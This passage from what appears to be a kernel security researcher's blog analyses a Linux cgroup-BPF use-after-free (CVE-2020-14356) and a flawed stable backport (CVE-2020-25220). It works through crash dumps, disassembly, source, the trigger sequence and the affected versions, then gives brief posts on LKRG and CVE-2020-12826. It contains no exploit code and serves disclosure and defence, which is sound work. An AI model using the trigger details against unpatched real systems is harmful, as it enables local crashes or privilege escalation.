#17 [ffffb0fc41b1ff08] do_group_exit at ffffffff9412b8ae
#18 [ffffb0fc41b1ff30] __x64_sys_exit_group at ffffffff9412b92f
#19 [ffffb0fc41b1ff38] do_syscall_64 at ffffffff940028d7
#20 [ffffb0fc41b1ff50] entry_SYSCALL_64_after_hwframe at ffffffff95c0007c
    RIP: 00007fe54ea30136  RSP: 00007fff33413468  RFLAGS: 00000202
    RAX: ffffffffffffffda  RBX: 00007fff334134e0  RCX: 00007fe54ea30136
    RDX: 00000000000000ff  RSI: 000000000000003c  RDI: 00000000000000ff
    RBP: 00000000000000ff   R8: 00000000000000e7   R9: fffffffffffffdf0
    R10: 000055a091a22d09  R11: 0000000000000202  R12: 000055a091d67f20
    R13: 00007fe54ea5afa0  R14: 000055a091d7ef70  R15: 000055a091d70a20
    ORIG_RAX: 00000000000000e7  CS: 0033  SS: 002b

1060499 is a sshd’s child:

...
root        5462  0.0  0.0  12168  7276 ?        Ss   04:38   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
...
root     1060499  0.0  0.1  13936  9056 ?        Ss   17:51   0:00  \_ sshd: pi3 [priv]
pi3      1062463  0.0  0.0  13936  5852 ?        S    17:51   0:00      \_ sshd: pi3@pts/3
...

Crash happens in function “__cgroup_bpf_run_filter_skb”, exactly in this piece of code:

0xffffffff9423e7ee <__cgroup_bpf_run_filter_skb+382>: callq  0xffffffff94153cb0 <preempt_count_add>
0xffffffff9423e7f3 <__cgroup_bpf_run_filter_skb+387>: callq  0xffffffff941925a0 <__rcu_read_lock>
0xffffffff9423e7f8 <__cgroup_bpf_run_filter_skb+392>: mov 0x3e8(%rbp),%rax
0xffffffff9423e7ff <__cgroup_bpf_run_filter_skb+399>: xor %ebp,%ebp
0xffffffff9423e801 <__cgroup_bpf_run_filter_skb+401>: mov 0x10(%rax),%rdi
                                                          ^^^^^^^^^^^^^^^
0xffffffff9423e805 <__cgroup_bpf_run_filter_skb+405>: lea 0x10(%rax),%r14
0xffffffff9423e809 <__cgroup_bpf_run_filter_skb+409>: test %rdi,%rdi

where RAX: 0000000000000000. However, when I was playing with repro under SLAB_DEBUG, I often got RAX: 6b6b6b6b6b6b6b6b:

    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9123e801  RSP: ffffb136c16ffb88  RFLAGS: 00010246
    RAX: 6b6b6b6b6b6b6b6b  RBX: ffff9ce3e5a0e0e0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9ce3de26b280  RDI: ffffffff9123e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001

So we have kind of a Use-After-Free bug. This bug is triggerable from user-mode. I’ve looked under IDA for the binary:

.text:FFFFFFFF8123E7EE skb = rbx      ; sk_buff * ; PIC mode
.text:FFFFFFFF8123E7EE type = r15     ; bpf_attach_type
.text:FFFFFFFF8123E7EE save_sk = rsi  ; sock *
.text:FFFFFFFF8123E7EE        call    near ptr preempt_count_add-0EAB43h
.text:FFFFFFFF8123E7F3        call    near ptr __rcu_read_lock-0AC258h ; PIC mode
.text:FFFFFFFF8123E7F8        mov     ret, [rbp+3E8h]
.text:FFFFFFFF8123E7FF        xor     ebp, ebp
.text:FFFFFFFF8123E801 _cn = rbp      ; u32
.text:FFFFFFFF8123E801        mov     rdi, [ret+10h]  ; prog
.text:FFFFFFFF8123E805        lea     r14, [ret+10h]

and this code is referencing cgroups from the socket. Source code:

int __cgroup_bpf_run_filter_skb(struct sock *sk,
				struct sk_buff *skb,
				enum bpf_attach_type type)
{
    ...
	struct cgroup *cgrp;
    ...

    ...
	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);
    ...
	if (type == BPF_CGROUP_INET_EGRESS) {
		ret = BPF_PROG_CGROUP_INET_EGRESS_RUN_ARRAY(
			cgrp->bpf.effective[type], skb, __bpf_prog_run_save_cb);
    ...
    ...
}

Debugger:

crash> x/4i 0xffffffff9423e7f8
   0xffffffff9423e7f8:  mov    0x3e8(%rbp),%rax
   0xffffffff9423e7ff:  xor    %ebp,%ebp
   0xffffffff9423e801:  mov    0x10(%rax),%rdi
   0xffffffff9423e805:  lea    0x10(%rax),%r14
crash> p/x (int)&((struct cgroup*)0)->bpf
$2 = 0x3e0
crash> ptype struct cgroup_bpf
type = struct cgroup_bpf {
    struct bpf_prog_array *effective[28];
    struct list_head progs[28];
    u32 flags[28];
    struct bpf_prog_array *inactive;
    struct percpu_ref refcnt;
    struct work_struct release_work;
}
crash> print/a sizeof(struct bpf_prog_array)
$3 = 0x10
crash> print/a ((struct sk_buff *)0xffff9ce3e5a0e0e0)->sk
$4 = 0xffff9ce3de26b280
crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

We also know that R15: 0000000000000001 == type == BPF_CGROUP_INET_EGRESS

crash> p/a ((struct cgroup *)0xffff9ce3e2416800)->bpf.effective[1]
$6 = 0x6b6b6b6b6b6b6b6b
crash> x/20a 0xffff9ce3e2416800
0xffff9ce3e2416800:     0x6b6b6b6b6b6b016b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416810:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416820:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416830:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416840:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416850:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416860:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416870:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416880:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416890:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
crash>

This pointer (struct cgroup *)

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

Points to the freed object. However, kernel still keeps eBPF rules attached to the socket under cgroups. When process (sshd) dies (do_exit() call) and cleanup is executed, all sockets are being closed. If such socket has “pending” packets, the following code path is executed:

do_exit -> ... -> sock_close -> __sock_release -> inet_release -> tcp_close -> __tcp_push_pending_frames -> tcp_write_xmit -> __tcp_transmit_skb -> __ip_queue_xmit -> ip_finish_output -> __cgroup_bpf_run_filter_skb

However, there is nothing wrong with such logic and path. The real problem is that cgroups disappeared while still holding active clients. How is that even possible? Just before the crash I can see the following entry in kernel logs:

[190820.457422] ------------[ cut here ]------------
[190820.457465] percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[190820.457511] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457511] Modules linked in: [last unloaded: p_lkrg]
[190820.457513] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Tainted: G           OE     5.7.0-g4 #28
[190820.457513] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[190820.457515] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457516] Code: eb b6 80 3d 11 95 5a 02 00 0f 85 65 ff ff ff 48 8b 55 d8 48 8b 75 e8 48 c7 c7 d0 9f 78 93 c6 05 f5 94 5a 02 01 e8 00 57 88 ff <0f> 0b e9 43 ff ff ff 0f 0b eb 9d cc cc cc 8d 8c 16 ef be ad de 89
[190820.457516] RSP: 0018:ffffb136c0087e00 EFLAGS: 00010286
[190820.457517] RAX: 0000000000000000 RBX: 7ffffffffffeec4a RCX: 0000000000000000
[190820.457517] RDX: 0000000000000101 RSI: ffffffff949235c0 RDI: 00000000ffffffff
[190820.457517] RBP: ffff9ce3e204af20 R08: 6d6f7461206f7420 R09: 63696d6f7461206f
[190820.457517] R10: 7320726574666120 R11: 676e696863746977 R12: 00003452c5002ce8
[190820.457518] R13: ffff9ce3f6e2b450 R14: ffff9ce2c7fc3100 R15: 0000000000000000
[190820.457526] FS:  0000000000000000(0000) GS:ffff9ce3f6e00000(0000) knlGS:0000000000000000
[190820.457527] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[190820.457527] CR2: 00007f516c2b9000 CR3: 0000000222c64006 CR4: 00000000003606f0
[190820.457550] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[190820.457551] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[190820.457551] Call Trace:
[190820.457577]  rcu_core+0x1df/0x530
[190820.457598]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457609]  __do_softirq+0xfc/0x331
[190820.457629]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457630]  run_ksoftirqd+0x21/0x30
[190820.457649]  smpboot_thread_fn+0x195/0x230
[190820.457660]  kthread+0x139/0x160
[190820.457670]  ? __kthread_bind_mask+0x60/0x60
[190820.457671]  ret_from_fork+0x35/0x40
[190820.457682] ---[ end trace 63d2aef89e998452 ]---

I was testing the same scenario a few times and I had the following results:

 percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-18829) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-29849) after switching to atomic

Let’s look at this function:

/**
 * cgroup_bpf_release_fn() - callback used to schedule releasing
 *                           of bpf cgroup data
 * @ref: percpu ref counter structure
 */
static void cgroup_bpf_release_fn(struct percpu_ref *ref)
{
	struct cgroup *cgrp = container_of(ref, struct cgroup, bpf.refcnt);

	INIT_WORK(&cgrp->bpf.release_work, cgroup_bpf_release);
	queue_work(system_wq, &cgrp->bpf.release_work);
}

So that’s the callback used to release bpf cgroup data. Sounds like it is being called while there could be still active socket attached to such cgroup:

/**
 * cgroup_bpf_release() - put references of all bpf programs and
 *                        release all cgroup bpf data
 * @work: work structure embedded into the cgroup to modify
 */
static void cgroup_bpf_release(struct work_struct *work)
{
	struct cgroup *p, *cgrp = container_of(work, struct cgroup,
					       bpf.release_work);
	struct bpf_prog_array *old_array;
	unsigned int type;

	mutex_lock(&cgroup_mutex);

	for (type = 0; type < ARRAY_SIZE(cgrp->bpf.progs); type++) {
		struct list_head *progs = &cgrp->bpf.progs[type];
		struct bpf_prog_list *pl, *tmp;

		list_for_each_entry_safe(pl, tmp, progs, node) {
			list_del(&pl->node);
			if (pl->prog)
				bpf_prog_put(pl->prog);
			if (pl->link)
				bpf_cgroup_link_auto_detach(pl->link);
			bpf_cgroup_storages_unlink(pl->storage);
			bpf_cgroup_storages_free(pl->storage);
			kfree(pl);
			static_branch_dec(&cgroup_bpf_enabled_key);
		}
		old_array = rcu_dereference_protected(
				cgrp->bpf.effective[type],
				lockdep_is_held(&cgroup_mutex));
		bpf_prog_array_free(old_array);
	}

	mutex_unlock(&cgroup_mutex);

	for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
		cgroup_bpf_put(p);

	percpu_ref_exit(&cgrp->bpf.refcnt);
	cgroup_put(cgrp);
}

while:

static void bpf_cgroup_link_auto_detach(struct bpf_cgroup_link *link)
{
	cgroup_put(link->cgroup);
	link->cgroup = NULL;
}

So if cgroup dies, all the potential clients are being auto_detached. However, they might not be aware about such situation. When is cgroup_bpf_release_fn() executed?

/**
 * cgroup_bpf_inherit() - inherit effective programs from parent
 * @cgrp: the cgroup to modify
 */
int cgroup_bpf_inherit(struct cgroup *cgrp)
{
    ...
  	ret = percpu_ref_init(&cgrp->bpf.refcnt, cgroup_bpf_release_fn, 0,
			      GFP_KERNEL);
    ...
}

It is automatically executed when cgrp->bpf.refcnt drops to 1. However, in the warning logs before kernel had crashed, we saw that such reference counter is below 0. Cgroup was already freed.

Originally, I thought that the problem might be related to the code walking through the cgroup hierarchy without holding cgroup_mutex, which was pointed out by Alexei. I’ve prepared the patch and recompiled the kernel:

$ diff -u cgroup.c linux-5.7/kernel/bpf/cgroup.c
--- cgroup.c    2020-05-31 23:49:15.000000000 +0000
+++ linux-5.7/kernel/bpf/cgroup.c       2020-07-17 16:31:10.712969480 +0000
@@ -126,11 +126,11 @@
                bpf_prog_array_free(old_array);
        }

-       mutex_unlock(&cgroup_mutex);
-
        for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
                cgroup_bpf_put(p);

+       mutex_unlock(&cgroup_mutex);
+
        percpu_ref_exit(&cgrp->bpf.refcnt);
        cgroup_put(cgrp);
 }

Interestingly, without this patch I was able to generate this kernel crash every time when I was rebooting the machine (100% repro). After this patch crashing ratio dropped to around 30%. However, I was still able to hit the same code-path and generate kernel dump. The patch indeed helps but it looks like it’s not the real problem since I can still hit the crash (just much less often).

I stepped back and looked again where the bug is. Corrupted pointer (struct cgroup *) is comming from that line:

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

this code is related to the CONFIG_SOCK_CGROUP_DATA. Linux source has an interesting comment about it in “cgroup-defs.h” file:

/*
 * sock_cgroup_data is embedded at sock->sk_cgrp_data and contains
 * per-socket cgroup information except for memcg association.
 *
 * On legacy hierarchies, net_prio and net_cls controllers directly set
 * attributes on each sock which can then be tested by the network layer.
 * On the default hierarchy, each sock is associated with the cgroup it was
 * created in and the networking layer can match the cgroup directly.
 *
 * To avoid carrying all three cgroup related fields separately in sock,
 * sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer.
 * On boot, sock_cgroup_data records the cgroup that the sock was created
 * in so that cgroup2 matches can be made; however, once either net_prio or
 * net_cls starts being used, the area is overriden to carry prioidx and/or
 * classid.  The two modes are distinguished by whether the lowest bit is
 * set.  Clear bit indicates cgroup pointer while set bit prioidx and
 * classid.
 *
 * While userland may start using net_prio or net_cls at any time, once
 * either is used, cgroup2 matching no longer works.  There is no reason to
 * mix the two and this is in line with how legacy and v2 compatibility is
 * handled.  On mode switch, cgroup references which are already being
 * pointed to by socks may be leaked.  While this can be remedied by adding
 * synchronization around sock_cgroup_data, given that the number of leaked
 * cgroups is bound and highly unlikely to be high, this seems to be the
 * better trade-off.
 */

and later:

/*
 * There's a theoretical window where the following accessors race with
 * updaters and return part of the previous pointer as the prioidx or
 * classid.  Such races are short-lived and the result isn't critical.
 */

This means that sock_cgroup_data “carries” the information whether net_prio or net_cls starts being used and in such case sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer. In our crash we can extract this information:

crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

Described socket keeps the “sk_cgrp_data” pointer with the information of being “attached” to the cgroup2. However, cgroup2 has been destroyed.
Now we have all the information to solve the mystery of this bug:

Process creates a socket and both of them are inside some cgroup v2 (non-root)
- cgroup BPF is cgroup2 only
At some point net_prio or net_cls is being used:
- this operation is disabling cgroup2 socket matching
- now, all related sockets should be converted to use net_prio, and sk_cgrp_data should be updated
The socket is cloned, but not the reference to the cgroup (ref: point 1)
- this essentially moves the socket to the new cgroup
All tasks in the old cgroup (ref: point 1) must die and when this happens, this cgroup dies as well
When original process is starting to “use” the socket, it might attempt to access cgroup which is already “dead”. This essentially generates Use-After-Free condition
- in my specific case, process was killed or invoked exit()
- during the execution of do_exit() function, all file descriptors and all sockets are being closed
- one of the socket still points to the previously destroyed cgroup2 BPF (OpenSSH might install BPF)
- __cgroup_bpf_run_filter_skb runs attached BPF and we have Use-After-Free

To confirm that scenario, I’ve modified some of the Linux kernel sources:

Function cgroup_sk_alloc_disable():
- I’ve added dump_stack();
Function cgroup_bpf_release():
- I’ve moved mutex to guard code responsible for walking through the cgroup hierarchy

I’ve managed to reproduce this bug again and this is what I can see in the logs:

...
[   72.061197] kmem.limit_in_bytes is deprecated and will be removed. Please report your usecase to [email protected] if you depend on this functionality.
[   72.121572] cgroup: cgroup: disabling cgroup2 socket matching due to net_prio or net_cls activation
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[   72.121574] CPU: 0 PID: 6958 Comm: kubelet Kdump: loaded Not tainted 5.7.0-g6 #32
[   72.121574] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[   72.121575] Call Trace:
[   72.121580]  dump_stack+0x50/0x70
[   72.121582]  cgroup_sk_alloc_disable.cold+0x11/0x25
                ^^^^^^^^^^^^^^^^^^^^^^^
[   72.121584]  net_prio_attach+0x22/0xa0
                ^^^^^^^^^^^^^^^
[   72.121586]  cgroup_migrate_execute+0x371/0x430
[   72.121587]  cgroup_attach_task+0x132/0x1f0
[   72.121588]  __cgroup1_procs_write.constprop.0+0xff/0x140
                ^^^^^^^^^^^^^^^^^^^^^^
[   72.121590]  kernfs_fop_write+0xc9/0x1a0
[   72.121592]  vfs_write+0xb1/0x1a0
[   72.121593]  ksys_write+0x5a/0xd0
[   72.121595]  do_syscall_64+0x47/0x190
[   72.121596]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   72.121598] RIP: 0033:0x48abdb
[   72.121599] Code: ff e9 69 ff ff ff cc cc cc cc cc cc cc cc cc e8 7b 68 fb ff 48 8b 7c 24 10 48 8b 74 24 18 48 8b 54 24 20 48 8b 44 24 08 0f 05 <48> 3d 01 f0 ff ff 76 20 48 c7 44 24 28 ff ff ff ff 48 c7 44 24 30
[   72.121600] RSP: 002b:000000c00110f778 EFLAGS: 00000212 ORIG_RAX: 0000000000000001
[   72.121601] RAX: ffffffffffffffda RBX: 000000c000060000 RCX: 000000000048abdb
[   72.121601] RDX: 0000000000000004 RSI: 000000c00110f930 RDI: 000000000000001e
[   72.121601] RBP: 000000c00110f7c8 R08: 000000c00110f901 R09: 0000000000000004
[   72.121602] R10: 000000c0011a39a0 R11: 0000000000000212 R12: 000000000000019b
[   72.121602] R13: 000000000000019a R14: 0000000000000200 R15: 0000000000000000

As we can see, net_prio is being activated and cgroup2 socket matching is being disabled. Next:

[  287.497527] percpu ref (cgroup_bpf_release_fn) <= 0 (-79) after switching to atomic
[  287.497535] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x11f/0x12a
[  287.497536] Modules linked in:
[  287.497537] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Not tainted 5.7.0-g6 #32
[  287.497538] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.497539] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x11f/0x12a

cgroup_bpf_release_fn is being executed multiple times. All cgroup BPF entries has been deleted and freed. Next:

[  287.543976] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] PREEMPT SMP PTI
[  287.544062] CPU: 0 PID: 11398 Comm: realpath Kdump: loaded Tainted: G        W         5.7.0-g6 #32
[  287.544133] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.544217] RIP: 0010:__cgroup_bpf_run_filter_skb+0xd4/0x230
[  287.544267] Code: 00 48 01 c8 48 89 43 50 41 83 ff 01 0f 84 c2 00 00 00 e8 6f 55 f1 ff e8 5a 3e f5 ff 44 89 fa 48 8d 84 d5 e0 03 00 00 48 8b 00 <48> 8b 78 10 4c 8d 78 10 48 85 ff 0f 84 29 01 00 00 bd 01 00 00 00
[  287.544398] RSP: 0018:ffff957740003af8 EFLAGS: 00010206
[  287.544446] RAX: 6b6b6b6b6b6b6b6b RBX: ffff8911f339cf00 RCX: 0000000000000028
[  287.544506] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000001
[  287.544566] RBP: ffff8911e2eb5000 R08: 0000000000000000 R09: 0000000000000001
[  287.544625] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000014
[  287.544685] R13: 0000000000000014 R14: 0000000000000000 R15: 0000000000000000
[  287.544753] FS:  00007f86e885a580(0000) GS:ffff8911f6e00000(0000) knlGS:0000000000000000
[  287.544833] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  287.544919] CR2: 000055fb75e86da4 CR3: 0000000221316003 CR4: 00000000003606f0
[  287.544996] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  287.545063] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  287.545129] Call Trace:
[  287.545167]  <IRQ>
[  287.545204]  sk_filter_trim_cap+0x10c/0x250
[  287.545253]  ? nf_ct_deliver_cached_events+0xb6/0x120
[  287.545308]  ? tcp_v4_inbound_md5_hash+0x47/0x160
[  287.545359]  tcp_v4_rcv+0xb49/0xda0
[  287.545404]  ? nf_hook_slow+0x3a/0xa0
[  287.545449]  ip_protocol_deliver_rcu+0x26/0x1d0
[  287.545500]  ip_local_deliver_finish+0x50/0x60
[  287.545550]  ip_sublist_rcv_finish+0x38/0x50
[  287.545599]  ip_sublist_rcv+0x16d/0x200
[  287.545645]  ? ip_rcv_finish_core.constprop.0+0x470/0x470
[  287.545701]  ip_list_rcv+0xf1/0x115
[  287.545746]  __netif_receive_skb_list_core+0x249/0x270
[  287.545801]  netif_receive_skb_list_internal+0x19f/0x2c0
[  287.545856]  napi_complete_done+0x8e/0x130
[  287.545905]  e1000_clean+0x27e/0x600
[  287.545951]  ? security_cred_free+0x37/0x50
[  287.545999]  net_rx_action+0x133/0x3b0
[  287.546045]  __do_softirq+0xfc/0x331
[  287.546091]  irq_exit+0x92/0x110
[  287.546133]  do_IRQ+0x6d/0x120
[  287.546175]  common_interrupt+0xf/0xf
[  287.546219]  </IRQ>
[  287.546255] RIP: 0010:__x64_sys_exit_group+0x4/0x10

We have our crash referencing freed memory.

First CVE – CVE-2020-14356:

I’ve decided to report this issue to the Linux Kernel security mailing list around the mid-July (2020). Roman Gushchin replied to my report and suggested to verify if I can still repro this issue when commit ad0f75e5f57c (“cgroup: fix cgroup_sk_alloc() for sk_clone_lock()”) is applied. This commit was merged to the Linux Kernel git source tree just a few days before my report. I’ve carefully verified it and indeed it fixed the problem. However, commit ad0f75e5f57c is not fully complete and a follow-up fix 14b032b8f8fc (“cgroup: Fix sock_cgroup_data on big-endian.”) should be applied as well.

After this conversation Greg KH decided to backport Roman’s patches to the LTS kernels. In the meantime, I’ve decided to apply for CVE number (through RedHat) to track this issue:

CVE-2020-14356 was allocated to track this issue
For some unknown reasons, this bug was classified as NULL pointer dereference

RedHat correctly acknowledged this issue as Use-After-Free and in their own description and bugzilla they specify:

“A use-after-free flaw was found in the Linux kernel’s cgroupv2 (…)”
https://access.redhat.com/security/cve/cve-2020-14356
“It was found that the Linux kernel’s use after free issue (…)”
https://bugzilla.redhat.com/show_bug.cgi?id=1868453

However, in CVE MITRE portal we can see a very inaccurate description:

“A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.”
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14356

First, it is not NULL pointer dereference but Use-After-Free bug. Maybe it is badly classified based on that opened bug:
https://bugzilla.kernel.org/show_bug.cgi?id=208003

People have started to hit this Use-After-Free bug in the form of NULL pointer dereference “kernel panic”.

Additionally, the entire description of the bug is wrong. I’ve raised that concern to the CVE MITRE but the invalid description is still there. There is also a small Twitter discussion about that here:
https://twitter.com/Adam_pi3/status/1296212546043740160

Second CVE – CVE-2020-25220:

During analysis of this bug, I contacted Brad Spengler. When the patch for this issue was backported to LTS kernels, Brad noticed that it conflicted with his pre-existing backport, and that the upstream backport looked incorrect. I was surprised since I had reviewed the original commit for mainline kernel (5.7) and it was fine. Having this in mind, I decided to carefully review the backported patch:
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-4.14.y&id=82fd2138a5ffd7e0d4320cdb669e115ee976a26e

and it really looks incorrect. Part of the original fix is the following code:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   if (skcd->val) {
+       if (skcd->no_refcnt)
+           return;
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+       cgroup_bpf_get(sock_cgroup_ptr(skcd));
+   }
+}

However, backported patch has the following logic:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   /* Socket clone path */
+   if (skcd->val) {
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+   }
+}

There is a missing check:

+       if (skcd->no_refcnt)
+           return;

which could result in reference counter bug and in the end Use-After-Free again. It looks like the backported patch for stable kernels is still buggy.

I’ve contacted RedHat again and they started to provide correct patches for their own kernels. However, LTS kernels were still buggy. I’ve also asked to assign a separate CVE for that issue but RedHat suggested that I do it myself.

After that, I went for vacation and forgot about this issue Recently, I’ve decided to apply for CVE to track the “bad patch” issue, and CVE-2020-25220 was allocated. It is worth to point out that someone from Huawei at some point realized that patch is wrong and LTS got a correct fix as well:

https://www.spinics.net/lists/stable/msg405099.html

What is worth to mention, grsecurity backport was never affected by the CVE-2020-25220.

Summary:

Original issue, tracked by CVE-2020-14356, affects kernels starting from 4.5+ up to 5.7.10.

RedHat correctly fixed all their kernels, and has proper description of the bug
CVE MITRE still has invalid and misleading description

Badly backported patch, tracked by CVE-2020-25220, affects kernels:

4.19 until version 4.19.140 (exclusive)
4.14 until version 4.14.194 (exclusive)
4.9 until version 4.9.233 (exclusive)

*grsecurity kernels were never affected by the CVE-2020-25220

Best regards,
Adam ‘pi3’ Zabrocki

pi3 blog
LKRG 0.8pi3
25 June 2020 at 21:49

LKRG 0.8

pi3 blog

By: pi3

25 June 2020 at 21:49

Hi,

We’ve just announced a new version of LKRG 0.8! It includes enormous amount of changes – in fact, so much that we’re not trying to document all of the changes this time (although they can be seen from the git commits), but rather focus on high-level aspects. I encourage to read full announcement here:

https://www.openwall.com/lists/announce/2020/06/25/1

Btw. Among others, we have added support for Raspberry Pi 3 & 4, better scalability, performance, and tradeoffs, the notion of profiles, new documentation, @Phoronix benchmarks, and more

Best regards,
Adam

pi3 blog
Effectiveness of Linux Rootkit Detection Toolspi3
15 June 2020 at 03:40

Effectiveness of Linux Rootkit Detection Tools

pi3 blog

By: pi3

15 June 2020 at 03:40

I would like to draw draw attention to the following Openwall’s tweet:

Juho Junnila's Master's Thesis "Effectiveness of Linux Rootkit Detection Tools" shows our LKRG as by far the most effective kernel rootkit detector (of those tested), even though that wasn't our primary focus: https://t.co/pz0r502dK6 h/t @Adam_pi3
— Openwall (@Openwall) June 14, 2020

and the full post on LKRG’s mailing list here:

https://www.openwall.com/lists/lkrg-users/2020/06/14/5

Thanks,
Adam

pi3 blog
CVE-2020-12826pi3
15 May 2020 at 00:21

CVE-2020-12826

pi3 blog

By: pi3

15 May 2020 at 00:21

CVE-2020-12826 is assigned to track the problem with Linux kernel which I’ve described in my previous post:

Linux kernel bug – all kernels insufficiently restrict exit signals

CVE MITRE described the problem pretty accurately:

A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.

RedHat tracks this issue here:

https://bugzilla.redhat.com/show_bug.cgi?id=1822077

Debian here:

https://security-tracker.debian.org/tracker/CVE-2020-12826

Fix can be found here:

https://github.com/torvalds/linux/commit/7395ea4e65c2a00d23185a3f63ad315756ba9cef

What is interesting, the story of insufficient restriction of the exit signals might not be ended

How did this pass review and get backported to stable kernels? https://t.co/WhBrqUZhrw (Hint: case of right hand not knowing what the left is doing, involving a recent security fix)
— grsecurity (@grsecurity) May 14, 2020

In short, the following patch reintroduces the same problem:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b5f2006144c6ae941726037120fa1001ddede784

Best regards,
Adam

pi3 blog
Linux kernel bug – all kernels insufficiently restrict exit signalspi3
26 March 2020 at 00:09

Linux kernel bug – all kernels insufficiently restrict exit signals

pi3 blog

By: pi3

26 March 2020 at 00:09

I’ve recently spent some time looking at ‘exec_id’ counter. Historically, Linux kernel had 2 independent security problems related to that code: CVE-2009-1337 and CVE-2012-0056.

Until 2012, ‘self_exec_id’ field (among others) was used to enforce permissions checking restrictions for /proc/pid/{mem/maps/…} interface. However, it was done poorly and a serious security problem was reported, known as “Mempodipper” (CVE-2012-0056). Since that patch, ‘self_exec_id’ is not tracked anymore, but kernel is looking at process’ VM during the time of the open().

In 2009 Oleg Nesterov discovered that Linux kernel has an incorrect logic to reset ->exit_signal. As a result, the malicious user can bypass it if it execs the setuid application before exiting (->exit_signal won’t be reset to SIGCHLD). CVE-2009-1337 was assigned to track this issue.

